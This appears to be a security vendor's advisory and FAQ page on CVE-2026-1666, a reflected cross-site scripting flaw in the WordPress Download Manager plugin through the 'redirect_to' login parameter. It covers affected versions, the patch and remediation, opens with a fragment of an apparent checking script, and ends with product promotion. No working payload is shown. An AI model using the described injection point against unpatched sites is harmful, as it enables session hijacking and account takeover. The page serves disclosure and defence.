echo "3. Look for unsanitized redirect_to parameter values in page sourcen";
?>

Frequently Asked Questions

What is CVE-2026-1666?
Overview of the vulnerability
CVE-2026-1666 is a reflected cross-site scripting (XSS) vulnerability in the Download Manager plugin for WordPress. It affects versions up to and including 3.3.46, allowing unauthenticated attackers to inject malicious scripts via the ‘redirect_to’ parameter in the login form.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping for the ‘redirect_to’ GET parameter. Attackers can craft URLs containing JavaScript payloads that execute in the victim’s browser when they interact with the login form.
Who is affected by this vulnerability?
Identifying affected users
All users of the Download Manager plugin for WordPress who are running version 3.3.46 or earlier are affected. Administrators should verify their plugin version to determine if they need to take action.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, confirm that you are using Download Manager version 3.3.46 or earlier. You can do this by navigating to the Plugins section in your WordPress admin panel and checking the version number.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is fixed in version 3.3.47 of the Download Manager plugin. Administrators should update the plugin to the latest version immediately to mitigate the risk.
What does the CVSS score of 6.1 mean?
Understanding severity levels
A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while the vulnerability requires user interaction to exploit, it can still lead to significant risks such as session hijacking or phishing.
What are the potential risks of exploitation?
Consequences of a successful attack
Successful exploitation can allow attackers to execute arbitrary JavaScript in the victim’s browser, leading to session hijacking, account takeover, or redirection to malicious sites. This can compromise user credentials and sensitive information.
What is a proof of concept (PoC)?
Demonstrating the vulnerability
A proof of concept (PoC) is a demonstration that illustrates how the vulnerability can be exploited. In this case, the PoC shows how an attacker can craft a URL with a malicious ‘redirect_to’ parameter to execute JavaScript in the victim’s browser.
How does the patch mitigate the vulnerability?
Changes made in the updated version
The patch replaces the insecure `strip_tags()` function with `wp_validate_redirect()`, which properly validates URLs to prevent malicious redirects. This ensures that only safe URLs are processed, effectively mitigating the XSS risk.
What steps should I take after updating the plugin?
Post-update actions
After updating the plugin, it is advisable to review user access logs for any suspicious activity and educate users about the risks of clicking on unknown links. Regularly monitor your site for security updates and vulnerabilities.
Can this vulnerability be exploited without user interaction?
Nature of the attack
No, this vulnerability requires user interaction to be exploited. Attackers must trick users into clicking a crafted link that includes the malicious ‘redirect_to’ parameter to execute the attack.
Is there a way to further secure my WordPress site?
Additional security measures
To further secure your WordPress site, consider implementing security plugins, regularly updating all plugins and themes, and conducting security audits. Additionally, educate users about phishing and social engineering tactics.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations